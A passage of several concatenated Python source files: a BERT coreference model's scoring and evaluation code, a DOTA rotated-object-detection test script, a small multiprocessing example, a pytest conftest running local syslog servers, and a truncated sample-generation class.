is_training=is_training,
input_ids=input_ids,
input_mask=input_mask,
use_one_hot_embeddings=False,
scope='bert')
all_encoder_layers = model.get_all_encoder_layers()
mention_doc = model.get_sequence_output()
self.dropout = self.get_dropout(self.config["dropout_rate"], is_training)
num_sentences = tf.shape(mention_doc)[0]
max_sentence_length = tf.shape(mention_doc)[1]
mention_doc = self.flatten_emb_by_sentence(mention_doc, input_mask)
num_words = util.shape(mention_doc, 0)
antecedent_doc = mention_doc
flattened_sentence_indices = sentence_map
candidate_starts, candidate_ends = tf.clip_by_value(tf.concat([gold_starts, [0]], -1), 0, num_words-1), tf.clip_by_value(tf.concat([gold_ends, [0]], -1), 0, num_words-1)
#candidate_ends = tf.Print(candidate_ends, [candidate_ends])
candidate_cluster_ids = self.get_candidate_labels(candidate_starts, candidate_ends, gold_starts, gold_ends, cluster_ids) # [num_candidates]
candidate_span_emb = self.get_span_emb(mention_doc, mention_doc, candidate_starts, candidate_ends) # [num_candidates, emb]
candidate_mention_scores = self.get_mention_scores(candidate_span_emb, candidate_starts, candidate_ends)
candidate_mention_scores = tf.squeeze(candidate_mention_scores, 1) # [k]
# beam size
k = tf.minimum(3900, tf.to_int32(tf.floor(tf.to_float(num_words) * self.config["top_span_ratio"])))
c = tf.minimum(self.config["max_top_antecedents"], k)
# pull from beam
top_span_indices = coref_ops.extract_spans(tf.expand_dims(candidate_mention_scores, 0),
tf.expand_dims(candidate_starts, 0),
tf.expand_dims(candidate_ends, 0),
tf.expand_dims(k, 0),
num_words,
True) # [1, k]
top_span_indices.set_shape([1, None])
top_span_indices = tf.squeeze(top_span_indices, 0) # [k]
top_span_starts = tf.gather(candidate_starts, top_span_indices) # [k]
top_span_ends = tf.gather(candidate_ends, top_span_indices) # [k]
top_span_emb = tf.gather(candidate_span_emb, top_span_indices) # [k, emb]
top_span_cluster_ids = tf.gather(candidate_cluster_ids, top_span_indices) # [k]
top_span_mention_scores = tf.gather(candidate_mention_scores, top_span_indices) # [k]
genre_emb = tf.gather(tf.get_variable("genre_embeddings", [len(self.genres), self.config["feature_size"]]), genre) # [emb]
if self.config['use_metadata']:
speaker_ids = self.flatten_emb_by_sentence(speaker_ids, input_mask)
top_span_speaker_ids = tf.gather(speaker_ids, top_span_starts) # [k]i
else:
top_span_speaker_ids = None
dummy_scores = tf.zeros([k, 1]) # [k, 1]
top_antecedents, top_antecedents_mask, top_fast_antecedent_scores, top_antecedent_offsets = self.coarse_to_fine_pruning(top_span_emb, top_span_mention_scores, c)
num_segs, seg_len = util.shape(input_ids, 0), util.shape(input_ids, 1)
word_segments = tf.tile(tf.expand_dims(tf.range(0, num_segs), 1), [1, seg_len])
flat_word_segments = tf.boolean_mask(tf.reshape(word_segments, [-1]), tf.reshape(input_mask, [-1]))
mention_segments = tf.expand_dims(tf.gather(flat_word_segments, top_span_starts), 1) # [k, 1]
antecedent_segments = tf.gather(flat_word_segments, tf.gather(top_span_starts, top_antecedents)) #[k, c]
segment_distance = tf.clip_by_value(mention_segments - antecedent_segments, 0, self.config['max_training_sentences'] - 1) if self.config['use_segment_distance'] else None #[k, c]
if self.config['fine_grained']:
for i in range(self.config["coref_depth"]):
with tf.variable_scope("coref_layer", reuse=(i > 0)):
top_antecedent_emb = tf.gather(top_span_emb, top_antecedents) # [k, c, emb]
top_antecedent_scores = top_fast_antecedent_scores + self.get_slow_antecedent_scores(top_span_emb, top_antecedents, top_antecedent_emb, top_antecedent_offsets, top_span_speaker_ids, genre_emb, segment_distance) # [k, c]
top_antecedent_weights = tf.nn.softmax(tf.concat([dummy_scores, top_antecedent_scores], 1)) # [k, c + 1]
top_antecedent_emb = tf.concat([tf.expand_dims(top_span_emb, 1), top_antecedent_emb], 1) # [k, c + 1, emb]
attended_span_emb = tf.reduce_sum(tf.expand_dims(top_antecedent_weights, 2) * top_antecedent_emb, 1) # [k, emb]
with tf.variable_scope("f"):
f = tf.sigmoid(util.projection(tf.concat([top_span_emb, attended_span_emb], 1), util.shape(top_span_emb, -1))) # [k, emb]
top_span_emb = f * attended_span_emb + (1 - f) * top_span_emb # [k, emb]
else:
top_antecedent_scores = top_fast_antecedent_scores
top_antecedent_scores = tf.concat([dummy_scores, top_antecedent_scores], 1) # [k, c + 1]
top_antecedent_cluster_ids = tf.gather(top_span_cluster_ids, top_antecedents) # [k, c]
top_antecedent_cluster_ids += tf.to_int32(tf.log(tf.to_float(top_antecedents_mask))) # [k, c]
same_cluster_indicator = tf.equal(top_antecedent_cluster_ids, tf.expand_dims(top_span_cluster_ids, 1)) # [k, c]
non_dummy_indicator = tf.expand_dims(top_span_cluster_ids > 0, 1) # [k, 1]
pairwise_labels = tf.logical_and(same_cluster_indicator, non_dummy_indicator) # [k, c]
dummy_labels = tf.logical_not(tf.reduce_any(pairwise_labels, 1, keepdims=True)) # [k, 1]
top_antecedent_labels = tf.concat([dummy_labels, pairwise_labels], 1) # [k, c + 1]
loss = self.softmax_loss(top_antecedent_scores, top_antecedent_labels) # [k]
loss = tf.reduce_sum(loss) # []
return [candidate_starts, candidate_ends, candidate_mention_scores, top_span_starts, top_span_ends, top_antecedents, top_antecedent_scores], loss
def get_span_emb(self, head_emb, context_outputs, span_starts, span_ends):
span_emb_list = []
span_start_emb = tf.gather(context_outputs, span_starts) # [k, emb]
span_emb_list.append(span_start_emb)
span_end_emb = tf.gather(context_outputs, span_ends) # [k, emb]
span_emb_list.append(span_end_emb)
span_width = 1 + span_ends - span_starts # [k]
if self.config["use_features"]:
span_width_index = span_width - 1 # [k]
span_width_emb = tf.gather(tf.get_variable("span_width_embeddings", [self.config["max_span_width"], self.config["feature_size"]]), span_width_index) # [k, emb]
span_width_emb = tf.nn.dropout(span_width_emb, self.dropout)
span_emb_list.append(span_width_emb)
if self.config["model_heads"]:
mention_word_scores = self.get_masked_mention_word_scores(context_outputs, span_starts, span_ends)
head_attn_reps = tf.matmul(mention_word_scores, context_outputs) # [K, T]
span_emb_list.append(head_attn_reps)
span_emb = tf.concat(span_emb_list, 1) # [k, emb]
return span_emb # [k, emb]
def get_mention_scores(self, span_emb, span_starts, span_ends):
with tf.variable_scope("mention_scores"):
span_scores = util.ffnn(span_emb, self.config["ffnn_depth"], self.config["ffnn_size"], 1, self.dropout) # [k, 1]
if self.config['use_prior']:
span_width_emb = tf.get_variable("span_width_prior_embeddings", [self.config["max_span_width"], self.config["feature_size"]]) # [W, emb]
span_width_index = span_ends - span_starts # [NC]
with tf.variable_scope("width_scores"):
width_scores = util.ffnn(span_width_emb, self.config["ffnn_depth"], self.config["ffnn_size"], 1, self.dropout) # [W, 1]
width_scores = tf.gather(width_scores, span_width_index)
span_scores += width_scores
return span_scores
def get_width_scores(self, doc, starts, ends):
distance = ends - starts
span_start_emb = tf.gather(doc, starts)
hidden = util.shape(doc, 1)
with tf.variable_scope('span_width'):
span_width_emb = tf.gather(tf.get_variable("start_width_embeddings", [self.config["max_span_width"], hidden], initializer=tf.truncated_normal_initializer(stddev=0.02)), distance) # [W, emb]
scores = tf.reduce_sum(span_start_emb * span_width_emb, axis=1)
return scores
def get_masked_mention_word_scores(self, encoded_doc, span_starts, span_ends):
num_words = util.shape(encoded_doc, 0) # T
num_c = util.shape(span_starts, 0) # NC
doc_range = tf.tile(tf.expand_dims(tf.range(0, num_words), 0), [num_c, 1]) # [K, T]
mention_mask = tf.logical_and(doc_range >= tf.expand_dims(span_starts, 1), doc_range <= tf.expand_dims(span_ends, 1)) #[K, T]
with tf.variable_scope("mention_word_attn"):
word_attn = tf.squeeze(util.projection(encoded_doc, 1, initializer=tf.truncated_normal_initializer(stddev=0.02)), 1)
mention_word_attn = tf.nn.softmax(tf.log(tf.to_float(mention_mask)) + tf.expand_dims(word_attn, 0))
return mention_word_attn
def softmax_loss(self, antecedent_scores, antecedent_labels):
gold_scores = antecedent_scores + tf.log(tf.to_float(antecedent_labels)) # [k, max_ant + 1]
marginalized_gold_scores = tf.reduce_logsumexp(gold_scores, [1]) # [k]
log_norm = tf.reduce_logsumexp(antecedent_scores, [1]) # [k]
return log_norm - marginalized_gold_scores # [k]
def bucket_distance(self, distances):
"""
Places the given values (designed for distances) into 10 semi-logscale buckets:
[0, 1, 2, 3, 4, 5-7, 8-15, 16-31, 32-63, 64+].
"""
logspace_idx = tf.to_int32(tf.floor(tf.log(tf.to_float(distances))/math.log(2))) + 3
use_identity = tf.to_int32(distances <= 4)
combined_idx = use_identity * distances + (1 - use_identity) * logspace_idx
return tf.clip_by_value(combined_idx, 0, 9)
def get_slow_antecedent_scores(self, top_span_emb, top_antecedents, top_antecedent_emb, top_antecedent_offsets, top_span_speaker_ids, genre_emb, segment_distance=None):
k = util.shape(top_span_emb, 0)
c = util.shape(top_antecedents, 1)
feature_emb_list = []
if self.config["use_metadata"]:
top_antecedent_speaker_ids = tf.gather(top_span_speaker_ids, top_antecedents) # [k, c]
same_speaker = tf.equal(tf.expand_dims(top_span_speaker_ids, 1), top_antecedent_speaker_ids) # [k, c]
speaker_pair_emb = tf.gather(tf.get_variable("same_speaker_emb", [2, self.config["feature_size"]]), tf.to_int32(same_speaker)) # [k, c, emb]
feature_emb_list.append(speaker_pair_emb)
tiled_genre_emb = tf.tile(tf.expand_dims(tf.expand_dims(genre_emb, 0), 0), [k, c, 1]) # [k, c, emb]
feature_emb_list.append(tiled_genre_emb)
if self.config["use_features"]:
antecedent_distance_buckets = self.bucket_distance(top_antecedent_offsets) # [k, c]
antecedent_distance_emb = tf.gather(tf.get_variable("antecedent_distance_emb", [10, self.config["feature_size"]]), antecedent_distance_buckets) # [k, c]
feature_emb_list.append(antecedent_distance_emb)
if segment_distance is not None:
with tf.variable_scope('segment_distance', reuse=tf.AUTO_REUSE):
segment_distance_emb = tf.gather(tf.get_variable("segment_distance_embeddings", [self.config['max_training_sentences'], self.config["feature_size"]]), segment_distance) # [k, emb]
span_width_emb = tf.nn.dropout(segment_distance_emb, self.dropout)
feature_emb_list.append(segment_distance_emb)
feature_emb = tf.concat(feature_emb_list, 2) # [k, c, emb]
feature_emb = tf.nn.dropout(feature_emb, self.dropout) # [k, c, emb]
target_emb = tf.expand_dims(top_span_emb, 1) # [k, 1, emb]
similarity_emb = top_antecedent_emb * target_emb # [k, c, emb]
target_emb = tf.tile(target_emb, [1, c, 1]) # [k, c, emb]
pair_emb = tf.concat([target_emb, top_antecedent_emb, similarity_emb, feature_emb], 2) # [k, c, emb]
with tf.variable_scope("slow_antecedent_scores"):
slow_antecedent_scores = util.ffnn(pair_emb, self.config["ffnn_depth"], self.config["ffnn_size"], 1, self.dropout) # [k, c, 1]
slow_antecedent_scores = tf.squeeze(slow_antecedent_scores, 2) # [k, c]
return slow_antecedent_scores # [k, c]
def get_fast_antecedent_scores(self, top_span_emb):
with tf.variable_scope("src_projection"):
source_top_span_emb = tf.nn.dropout(util.projection(top_span_emb, util.shape(top_span_emb, -1)), self.dropout) # [k, emb]
target_top_span_emb = tf.nn.dropout(top_span_emb, self.dropout) # [k, emb]
return tf.matmul(source_top_span_emb, target_top_span_emb, transpose_b=True) # [k, k]
def flatten_emb_by_sentence(self, emb, text_len_mask):
num_sentences = tf.shape(emb)[0]
max_sentence_length = tf.shape(emb)[1]
emb_rank = len(emb.get_shape())
if emb_rank == 2:
flattened_emb = tf.reshape(emb, [num_sentences * max_sentence_length])
elif emb_rank == 3:
flattened_emb = tf.reshape(emb, [num_sentences * max_sentence_length, util.shape(emb, 2)])
else:
raise ValueError("Unsupported rank: {}".format(emb_rank))
return tf.boolean_mask(flattened_emb, tf.reshape(text_len_mask, [num_sentences * max_sentence_length]))
def get_predicted_antecedents(self, antecedents, antecedent_scores):
predicted_antecedents = []
for i, index in enumerate(np.argmax(antecedent_scores, axis=1) - 1):
if index < 0:
predicted_antecedents.append(-1)
else:
predicted_antecedents.append(antecedents[i, index])
return predicted_antecedents
def get_predicted_clusters(self, top_span_starts, top_span_ends, predicted_antecedents):
mention_to_predicted = {}
predicted_clusters = []
for i, predicted_index in enumerate(predicted_antecedents):
if predicted_index < 0:
continue
assert i > predicted_index, (i, predicted_index)
predicted_antecedent = (int(top_span_starts[predicted_index]), int(top_span_ends[predicted_index]))
if predicted_antecedent in mention_to_predicted:
predicted_cluster = mention_to_predicted[predicted_antecedent]
else:
predicted_cluster = len(predicted_clusters)
predicted_clusters.append([predicted_antecedent])
mention_to_predicted[predicted_antecedent] = predicted_cluster
mention = (int(top_span_starts[i]), int(top_span_ends[i]))
predicted_clusters[predicted_cluster].append(mention)
mention_to_predicted[mention] = predicted_cluster
predicted_clusters = [tuple(pc) for pc in predicted_clusters]
mention_to_predicted = { m:predicted_clusters[i] for m,i in mention_to_predicted.items() }
return predicted_clusters, mention_to_predicted
def evaluate_coref(self, top_span_starts, top_span_ends, predicted_antecedents, gold_clusters, evaluator):
gold_clusters = [tuple(tuple(m) for m in gc) for gc in gold_clusters]
mention_to_gold = {}
for gc in gold_clusters:
for mention in gc:
mention_to_gold[mention] = gc
predicted_clusters, mention_to_predicted = self.get_predicted_clusters(top_span_starts, top_span_ends, predicted_antecedents)
evaluator.update(predicted_clusters, gold_clusters, mention_to_predicted, mention_to_gold)
return predicted_clusters
def load_eval_data(self):
if self.eval_data is None:
def load_line(line):
example = json.loads(line)
return self.tensorize_example(example, is_training=False), example
with open(self.config["eval_path"]) as f:
self.eval_data = [load_line(l) for l in f.readlines()]
num_words = sum(tensorized_example[2].sum() for tensorized_example, _ in self.eval_data)
print("Loaded {} eval examples.".format(len(self.eval_data)))
def evaluate(self, session, global_step=None, official_stdout=False, keys=None, eval_mode=False):
self.load_eval_data()
coref_predictions = {}
coref_evaluator = metrics.CorefEvaluator()
losses = []
doc_keys = []
num_evaluated= 0
for example_num, (tensorized_example, example) in enumerate(self.eval_data):
_, _, _, _, _, _, gold_starts, gold_ends, _, _ = tensorized_example
feed_dict = {i:t for i,t in zip(self.input_tensors, tensorized_example)}
# if tensorized_example[0].shape[0] <= 9:
# if keys is not None and example['doc_key'] in keys:
# print('Skipping...', example['doc_key'], tensorized_example[0].shape)
# continue
doc_keys.append(example['doc_key'])
loss, (candidate_starts, candidate_ends, candidate_mention_scores, top_span_starts, top_span_ends, top_antecedents, top_antecedent_scores) = session.run([self.loss, self.predictions], feed_dict=feed_dict)
# losses.append(session.run(self.loss, feed_dict=feed_dict))
losses.append(loss)
predicted_antecedents = self.get_predicted_antecedents(top_antecedents, top_antecedent_scores)
coref_predictions[example["doc_key"]] = self.evaluate_coref(top_span_starts, top_span_ends, predicted_antecedents, example["clusters"], coref_evaluator)
if example_num % 10 == 0:
print("Evaluated {}/{} examples.".format(example_num + 1, len(self.eval_data)))
summary_dict = {}
# with open('doc_keys_512.txt', 'w') as f:
# for key in doc_keys:
# f.write(key + '\n')
if eval_mode:
conll_results = conll.evaluate_conll(self.config["conll_eval_path"], coref_predictions, self.subtoken_maps, official_stdout )
average_f1 = sum(results["f"] for results in conll_results.values()) / len(conll_results)
summary_dict["Average F1 (conll)"] = average_f1
print("Average F1 (conll): {:.2f}%".format(average_f1))
p,r,f = coref_evaluator.get_prf()
summary_dict["Average F1 (py)"] = f
print("Average F1 (py): {:.2f}% on {} docs".format(f * 100, len(doc_keys)))
summary_dict["Average precision (py)"] = p
print("Average precision (py): {:.2f}%".format(p * 100))
summary_dict["Average recall (py)"] = r
print("Average recall (py): {:.2f}%".format(r * 100))
return util.make_summary(summary_dict), f
|
test_dota.py
|
# -*- coding:utf-8 -*-
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import os
import sys
import tensorflow as tf
import cv2
import numpy as np
import math
from tqdm import tqdm
import argparse
from multiprocessing import Queue, Process
sys.path.append("../")
from data.io.image_preprocess import short_side_resize_for_inference_data
from libs.networks import build_whole_network
from help_utils import tools
from libs.label_name_dict.label_dict import *
from libs.box_utils import draw_box_in_img
from libs.box_utils.coordinate_convert import forward_convert, backward_convert
from libs.box_utils import nms_rotate
from libs.box_utils.rotate_polygon_nms import rotate_gpu_nms
def worker(gpu_id, images, det_net, args, result_queue):
os.environ["CUDA_VISIBLE_DEVICES"] = str(gpu_id)
img_plac = tf.placeholder(dtype=tf.uint8, shape=[None, None, 3]) # is RGB. not BGR
img_batch = tf.cast(img_plac, tf.float32)
img_batch = short_side_resize_for_inference_data(img_tensor=img_batch,
target_shortside_len=cfgs.IMG_SHORT_SIDE_LEN,
length_limitation=cfgs.IMG_MAX_LENGTH)
if cfgs.NET_NAME in ['resnet152_v1d', 'resnet101_v1d', 'resnet50_v1d']:
img_batch = (img_batch / 255 - tf.constant(cfgs.PIXEL_MEAN_)) / tf.constant(cfgs.PIXEL_STD)
else:
img_batch = img_batch - tf.constant(cfgs.PIXEL_MEAN)
img_batch = tf.expand_dims(img_batch, axis=0)
detection_boxes, detection_scores, detection_category = det_net.build_whole_detection_network(
input_img_batch=img_batch,
gtboxes_batch_h=None,
gtboxes_batch_r=None)
init_op = tf.group(
tf.global_variables_initializer(),
tf.local_variables_initializer()
)
restorer, restore_ckpt = det_net.get_restorer()
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
with tf.Session(config=config) as sess:
sess.run(init_op)
if not restorer is None:
restorer.restore(sess, restore_ckpt)
print('restore model %d ...' % gpu_id)
for img_path in images:
# if 'P0016' not in img_path:
# continue
img = cv2.imread(img_path)
box_res_rotate = []
label_res_rotate = []
score_res_rotate = []
imgH = img.shape[0]
imgW = img.shape[1]
if imgH < args.h_len:
temp = np.zeros([args.h_len, imgW, 3], np.float32)
temp[0:imgH, :, :] = img
img = temp
imgH = args.h_len
if imgW < args.w_len:
temp = np.zeros([imgH, args.w_len, 3], np.float32)
temp[:, 0:imgW, :] = img
img = temp
imgW = args.w_len
for hh in range(0, imgH, args.h_len - args.h_overlap):
if imgH - hh - 1 < args.h_len:
hh_ = imgH - args.h_len
else:
hh_ = hh
for ww in range(0, imgW, args.w_len - args.w_overlap):
if imgW - ww - 1 < args.w_len:
ww_ = imgW - args.w_len
else:
ww_ = ww
src_img = img[hh_:(hh_ + args.h_len), ww_:(ww_ + args.w_len), :]
resized_img, det_boxes_r_, det_scores_r_, det_category_r_ = \
sess.run(
[img_batch, detection_boxes, detection_scores, detection_category],
feed_dict={img_plac: src_img[:, :, ::-1]}
)
resized_h, resized_w = resized_img.shape[1], resized_img.shape[2]
src_h, src_w = src_img.shape[0], src_img.shape[1]
if len(det_boxes_r_) > 0:
det_boxes_r_ = forward_convert(det_boxes_r_, False)
det_boxes_r_[:, 0::2] *= (src_w / resized_w)
det_boxes_r_[:, 1::2] *= (src_h / resized_h)
det_boxes_r_ = backward_convert(det_boxes_r_, False)
for ii in range(len(det_boxes_r_)):
box_rotate = det_boxes_r_[ii]
box_rotate[0] = box_rotate[0] + ww_
box_rotate[1] = box_rotate[1] + hh_
box_res_rotate.append(box_rotate)
label_res_rotate.append(det_category_r_[ii])
score_res_rotate.append(det_scores_r_[ii])
box_res_rotate = np.array(box_res_rotate)
label_res_rotate = np.array(label_res_rotate)
score_res_rotate = np.array(score_res_rotate)
box_res_rotate_ = []
label_res_rotate_ = []
score_res_rotate_ = []
threshold = {'roundabout': 0.1, 'tennis-court': 0.3, 'swimming-pool': 0.1, 'storage-tank': 0.2,
'soccer-ball-field': 0.3, 'small-vehicle': 0.2, 'ship': 0.05, 'plane': 0.3,
'large-vehicle': 0.1, 'helicopter': 0.2, 'harbor': 0.0001, 'ground-track-field': 0.3,
'bridge': 0.0001, 'basketball-court': 0.3, 'baseball-diamond': 0.3}
for sub_class in range(1, cfgs.CLASS_NUM + 1):
index = np.where(label_res_rotate == sub_class)[0]
if len(index) == 0:
continue
tmp_boxes_r = box_res_rotate[index]
tmp_label_r = label_res_rotate[index]
tmp_score_r = score_res_rotate[index]
tmp_boxes_r = np.array(tmp_boxes_r)
tmp = np.zeros([tmp_boxes_r.shape[0], tmp_boxes_r.shape[1] + 1])
tmp[:, 0:-1] = tmp_boxes_r
tmp[:, -1] = np.array(tmp_score_r)
try:
inx = nms_rotate.nms_rotate_cpu(boxes=np.array(tmp_boxes_r),
scores=np.array(tmp_score_r),
iou_threshold=threshold[LABEL_NAME_MAP[sub_class]],
max_output_size=500)
except:
# Note: the IoU of two same rectangles is 0, which is calculated by rotate_gpu_nms
jitter = np.zeros([tmp_boxes_r.shape[0], tmp_boxes_r.shape[1] + 1])
jitter[:, 0] += np.random.rand(tmp_boxes_r.shape[0], ) / 1000
inx = rotate_gpu_nms(np.array(tmp, np.float32) + np.array(jitter, np.float32),
float(threshold[LABEL_NAME_MAP[sub_class]]), 0)
box_res_rotate_.extend(np.array(tmp_boxes_r)[inx])
score_res_rotate_.extend(np.array(tmp_score_r)[inx])
label_res_rotate_.extend(np.array(tmp_label_r)[inx])
result_dict = {'boxes': np.array(box_res_rotate_), 'scores': np.array(score_res_rotate_),
'labels': np.array(label_res_rotate_), 'image_id': img_path}
result_queue.put_nowait(result_dict)
def test_dota(det_net, real_test_img_list, args, txt_name):
save_path = os.path.join('./test_dota', cfgs.VERSION)
nr_records = len(real_test_img_list)
pbar = tqdm(total=nr_records)
gpu_num = len(args.gpus.strip().split(','))
nr_image = math.ceil(nr_records / gpu_num)
result_queue = Queue(500)
procs = []
for i, gpu_id in enumerate(args.gpus.strip().split(',')):
start = i * nr_image
end = min(start + nr_image, nr_records)
split_records = real_test_img_list[start:end]
proc = Process(target=worker, args=(int(gpu_id), split_records, det_net, args, result_queue))
print('process:%d, start:%d, end:%d' % (i, start, end))
proc.start()
procs.append(proc)
for i in range(nr_records):
res = result_queue.get()
if args.show_box:
nake_name = res['image_id'].split('/')[-1]
tools.mkdir(os.path.join(save_path, 'dota_img_vis'))
draw_path = os.path.join(save_path, 'dota_img_vis', nake_name)
draw_img = np.array(cv2.imread(res['image_id']), np.float32)
detected_indices = res['scores'] >= cfgs.VIS_SCORE
detected_scores = res['scores'][detected_indices]
detected_boxes = res['boxes'][detected_indices]
detected_categories = res['labels'][detected_indices]
final_detections = draw_box_in_img.draw_boxes_with_label_and_scores(draw_img,
boxes=detected_boxes,
labels=detected_categories,
scores=detected_scores,
method=1,
in_graph=False)
cv2.imwrite(draw_path, final_detections)
else:
CLASS_DOTA = NAME_LABEL_MAP.keys()
write_handle = {}
tools.mkdir(os.path.join(save_path, 'dota_res'))
for sub_class in CLASS_DOTA:
if sub_class == 'back_ground':
continue
write_handle[sub_class] = open(os.path.join(save_path, 'dota_res', 'Task1_%s.txt' % sub_class), 'a+')
rboxes = forward_convert(res['boxes'], with_label=False)
for i, rbox in enumerate(rboxes):
command = '%s %.3f %.1f %.1f %.1f %.1f %.1f %.1f %.1f %.1f\n' % (res['image_id'].split('/')[-1].split('.')[0],
res['scores'][i],
rbox[0], rbox[1], rbox[2], rbox[3],
rbox[4], rbox[5], rbox[6], rbox[7],)
write_handle[LABEL_NAME_MAP[res['labels'][i]]].write(command)
for sub_class in CLASS_DOTA:
if sub_class == 'back_ground':
continue
write_handle[sub_class].close()
fw = open(txt_name, 'a+')
fw.write('{}\n'.format(res['image_id'].split('/')[-1]))
fw.close()
pbar.set_description("Test image %s" % res['image_id'].split('/')[-1])
pbar.update(1)
for p in procs:
p.join()
def eval(num_imgs, args):
txt_name = '{}.txt'.format(cfgs.VERSION)
if not args.show_box:
if not os.path.exists(txt_name):
fw = open(txt_name, 'w')
fw.close()
fr = open(txt_name, 'r')
img_filter = fr.readlines()
print('****************************'*3)
print('Already tested imgs:', img_filter)
print('****************************'*3)
fr.close()
test_imgname_list = [os.path.join(args.test_dir, img_name) for img_name in os.listdir(args.test_dir)
if img_name.endswith(('.jpg', '.png', '.jpeg', '.tif', '.tiff')) and
(img_name + '\n' not in img_filter)]
else:
test_imgname_list = [os.path.join(args.test_dir, img_name) for img_name in os.listdir(args.test_dir)
if img_name.endswith(('.jpg', '.png', '.jpeg', '.tif', '.tiff'))]
assert len(test_imgname_list) != 0, 'test_dir has no imgs there.' \
' Note that, we only support img format of (.jpg, .png, and .tiff) '
if num_imgs == np.inf:
real_test_img_list = test_imgname_list
else:
real_test_img_list = test_imgname_list[: num_imgs]
retinanet = build_whole_network.DetectionNetwork(base_network_name=cfgs.NET_NAME,
is_training=False)
test_dota(det_net=retinanet, real_test_img_list=real_test_img_list, args=args, txt_name=txt_name)
if not args.show_box:
os.remove(txt_name)
def parse_args():
parser = argparse.ArgumentParser('evaluate the result.')
parser.add_argument('--test_dir', dest='test_dir',
help='evaluate imgs dir ',
default='/data/DOTA/test/images/', type=str)
parser.add_argument('--gpus', dest='gpus',
help='gpu id',
default='0,1,2,3,4,5,6,7', type=str)
parser.add_argument('--eval_num', dest='eval_num',
help='the num of eval imgs',
default=np.inf, type=int)
parser.add_argument('--show_box', '-s', default=False,
action='store_true')
parser.add_argument('--h_len', dest='h_len',
help='image height',
default=600, type=int)
parser.add_argument('--w_len', dest='w_len',
help='image width',
default=600, type=int)
parser.add_argument('--h_overlap', dest='h_overlap',
help='height overlap',
default=150, type=int)
parser.add_argument('--w_overlap', dest='w_overlap',
help='width overlap',
default=150, type=int)
args = parser.parse_args()
return args
if __name__ == '__main__':
args = parse_args()
print(20*"--")
print(args)
print(20*"--")
eval(args.eval_num,
args=args)
|
another_basic_multiprocessing.py
|
import random
import multiprocessing
import time
PROCESSES = 5
def worker(number):
sleeping_time = random.randrange(1, 10)
time.sleep(sleeping_time)
print("I'm worker {} and I slept {} seconds".format(number, sleeping_time))
for process_number in range(PROCESSES):
process = multiprocessing.Process(target=worker, args=(process_number,))
process.start()
|
conftest.py
|
# -*- coding: utf-8 -*-
"""Testing conf module."""
# standard library
import os
import threading
# third-party
import pytest
from falcon import testing
from .Custom.app import app_custom_logger
from .Null.app import app_null_logger
from .Rotating_Logger.app import app_rh_logger
from .Syslog.syslog_server import TestSyslogServers
# the log directory for all test cases
_LOG_DIRECTORY = os.path.join(os.getcwd(), 'log')
test_syslog = TestSyslogServers(address='0.0.0.0', log_directory=_LOG_DIRECTORY)
tcp_server = test_syslog.start_tcp_server(port=5141)
udp_server = test_syslog.start_udp_server(port=5140)
@pytest.fixture
def client_custom() -> testing.TestClient:
"""Create testing client fixture for logger app"""
return testing.TestClient(app_custom_logger)
@pytest.fixture
def client_null() -> testing.TestClient:
"""Create testing client fixture for logger app"""
return testing.TestClient(app_null_logger)
@pytest.fixture
def client_rh() -> testing.TestClient:
"""Create testing client fixture for logger app"""
return testing.TestClient(app_rh_logger)
@pytest.fixture
def client_sh_tcp() -> testing.TestClient:
"""Create testing client fixture for logger app"""
# import here so tcp server can be started first in pytest_configure
from .Syslog.app import app_sh_tcp_logger # pylint: disable=import-outside-toplevel
return testing.TestClient(app_sh_tcp_logger)
@pytest.fixture
def client_sh_udp() -> testing.TestClient:
"""Create testing client fixture for logger app"""
# import here so udp server can be started first in pytest_configure
from .Syslog.app import app_sh_udp_logger # pylint: disable=import-outside-toplevel
return testing.TestClient(app_sh_udp_logger)
@pytest.fixture
def log_directory() -> str:
"""Return the log directory."""
return _LOG_DIRECTORY
def pytest_configure() -> None:
"""Clear the log directory after tests are complete"""
# start TCP syslog servers
tcp_thread = threading.Thread(name='tcp_server', target=tcp_server.serve_forever, daemon=True)
tcp_thread.start()
# start UDP syslog servers
udp_thread = threading.Thread(name='udp_server', target=udp_server.serve_forever, daemon=True)
udp_thread.start()
def pytest_unconfigure(config: object) -> None: # pylint: disable=unused-argument
"""Clear the log directory after tests are complete"""
if os.path.isdir(_LOG_DIRECTORY):
for log_file in os.listdir(_LOG_DIRECTORY):
file_path = os.path.join(_LOG_DIRECTORY, log_file)
if os.path.isfile(file_path):
os.unlink(file_path)
os.rmdir(_LOG_DIRECTORY)
|
sampleConduct.py
|
# -*- coding: utf-8 -*-
# @Author: gunjianpan
# @Date: 2018-11-20 16:20:41
# @Last Modified by: gunjianpan
# @Last Modified time: 2018-12-31 12:24:09
import codecs
import logging
import numpy as np
import pickle
import queue
import random
import threading
from utils.utils import begin_time, end_time, flatten, spend_time, load_bigger, unifom_vector, unique_randomint
logger = logging.getLogger('relevance_logger')
class SampleConduct(object):
"""
1. multi to one line
2. generate negative sample
"""
def __init__(self):
self.content = {}
self.response = {}
self.pre = {}
self.origin_sample = []
self.test = []
self.word2vec = []
self.wordresult = {}
self.dev = []
self.train = []
def origin_sample_master(self, input_file, output1_file, output2_file, block_size=100000, valnum=10000):
"""
the master of mult-Theading for get origin sample
"""
version = begin_time()
with codecs.open(input_file, 'r', 'utf-8') as f:
self.origin_sample = f.readlines()
threadings = []
num = len(self.origin_sample)
start = 0
end = min(block_size, num - 1)
for block in range(int(num / block_size) + 1):
while self.origin_sample[end] != '\r\n' and end < num - 1:
end += 1
work = threading.Thread(
target=self.origin_sample_agent, args=(start, end, block,))
threadings.append(work)
start = end + 1
end = min(num - 1, block_size * (block + 1))
for work in threadings:
work.start()
for work in threadings:
work.join()
content = [self.content[k] for k in sorted(self.content.keys())]
self.content = sum(content, [])
response = [self.response[k] for k in sorted(self.response.keys())]
self.response = sum(response, [])
# pre = [self.pre[k] for k in sorted(self.pre.keys())]
# self.pre = sum(pre, [])
totalnum = len(self.response)
for index in range(len(self.content)):
context = self.content[index]
if index <= valnum:
self.dev.append("1#" + context + self.response[index])
else:
self.train.append("1#" + context + self.response[index])
otherindexs = np.random.randint(0, totalnum, 2)
for otherindex in otherindexs:
while otherindex == index:
otherindex = np.random.randint(0, totalnum, 1)[0]
if index <= valnum:
self.dev.append("0#" + context + self.response[otherindex])
else:
self.train.append(
"0#" + context + self.response[otherindex])
pickle.dump(self.train, open(output1_file, "wb"))
pickle.dump(self.dev, open(output2_file, "wb"))
end_time(version)
def onetime_master(self, input_file, output_file, block_size=900000, test_size=2000):
"""
by numpy
"""
version = begin_time()
with codecs.open(input_file, 'r', 'utf-8') as f:
